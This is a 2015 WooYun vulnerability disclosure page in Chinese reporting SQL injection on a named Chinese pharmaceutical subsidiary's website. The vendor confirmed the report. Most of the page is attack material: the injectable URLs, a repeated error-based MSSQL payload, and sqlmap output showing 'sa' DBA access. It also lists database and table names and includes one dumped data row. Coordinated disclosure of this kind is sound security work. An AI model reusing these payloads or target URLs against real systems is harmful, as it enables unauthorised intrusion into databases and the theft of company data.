当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135085

漏洞标题:华润医药旗下某公司存在多处SQL注入漏洞,泄露企业重要信息

相关厂商:华润三九医药股份有限公司

漏洞作者: XTT

提交时间:2015-08-18 18:56

修复时间:2015-10-03 15:22

公开时间:2015-10-03 15:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-18: 细节已通知厂商并且等待厂商处理中
2015-08-19: 厂商已经确认,细节仅向厂商公开
2015-08-29: 细节向核心白帽子及相关领域专家公开
2015-09-08: 细节向普通白帽子公开
2015-09-18: 细节向实习白帽子公开
2015-10-03: 细节向公众公开

简要描述:

公司存在多处SQL注入漏洞,严重影响数据安全性。

详细说明:

注入点:

http://www.crsdyy.com/sdgs/index.asp?buid=3701000110


---
Parameter: buid (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
current user: 'sa'
current user is DBA: True

漏洞证明:

---
Parameter: buid (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
available databases [9]:
[*] master
[*] model
[*] msdb
[*] sdgs
[*] shxt
[*] sjcj
[*] sjzl
[*] syxh
[*] tempdb


---
Parameter: buid (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: sdgs
[25 tables]
+----------------+
| biuser_bak |
| bulist |
| download |
| download_type |
| fwl |
| gysuser |
| ip |
| link |
| lxjl |
| medicine_type |
| news |
| news_type |
| product |
| pt_user |
| qyfc |
| qyxchz |
| qyxcmx |
| sqlmapoutput |
| sysuser |
| v_search |
| zhaoshang |
| zhaoshang_oid |
| zhaoshang_type |
| zlzx |
| zlzx_type |
+----------------+


---
Parameter: buid (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: master
[301 tables]
+---------------------------------------------------+
| INFORMATION_SCHEMA.CHECK_CONSTRAINTS |
| INFORMATION_SCHEMA.COLUMNS |
| INFORMATION_SCHEMA.COLUMN_DOMAIN_USAGE |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE |
| INFORMATION_SCHEMA.DOMAINS |
| INFORMATION_SCHEMA.DOMAIN_CONSTRAINTS |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE |
| INFORMATION_SCHEMA.PARAMETERS |
| INFORMATION_SCHEMA.REFERENTIAL_CONSTRAINTS |
| INFORMATION_SCHEMA.ROUTINES |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS |
| INFORMATION_SCHEMA.SCHEMATA |
| INFORMATION_SCHEMA.TABLES |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES |
| INFORMATION_SCHEMA.VIEWS |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE |
| MSreplication_options |
| dj_ls |
| djbh |
| djhz |
| djmx |
| kh_doc |
| sp_doc |
| spt_fallback_db |
| spt_fallback_dev |
| spt_fallback_usg |
| spt_monitor |
| spt_values |
| userlist |
| v_dj_ls |
| v_rkmx |
| sys.all_columns |
| sys.all_objects |
| sys.all_parameters |
| sys.all_sql_modules |
| sys.all_views |
+---------------------------------------------------+


---
Parameter: buid (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: sjcj
[81 tables]
+----------+
| aslk1 |
| becc1 |
| beyy1 |
| bjhh01 |
| bjhs01 |
| bjhs1 |
| bjnh1 |
| bjnhobu1 |
| bjsh1 |
| blg01 |
| blkxy01 |
+-----------


---
Parameter: buid (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: buid=3701000110' AND 2395=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(113)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2395=2395) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'yoKh'='yoKh
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
Database: sjcj
Table: aslk1
[1 entry]
+--------+------------+---------------------+---------+----------+---------+
| makeno | rq | warename | wareqty | wareunit | 公司名称 |
+--------+------------+---------------------+---------+----------+---------+
| XCWZ | 2015-08-17 | 注射用奥美拉唑钠(静脉滴注)(洛赛克) | 96.0000 | 支 | <blank> |
+--------+------------+---------------------+---------+----------+---------+


重要信息还很多,数据就不一一跑了~
其他注入点一起送上:

http://www.crsdyy.com/sdgs/index.asp?buid=3701000106
http://www.crsdyy.com/sdgs/index.asp?buid=3701000107
http://www.crsdyy.com/sdgs/index.asp?buid=3701000108

修复方案:

版权声明:转载请注明来源 XTT@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-19 15:20

厂商回复:

sa权限,又是分分钟打进内网的节奏,哎!!已通知药业集团

最新状态:

暂无


漏洞评价:

评论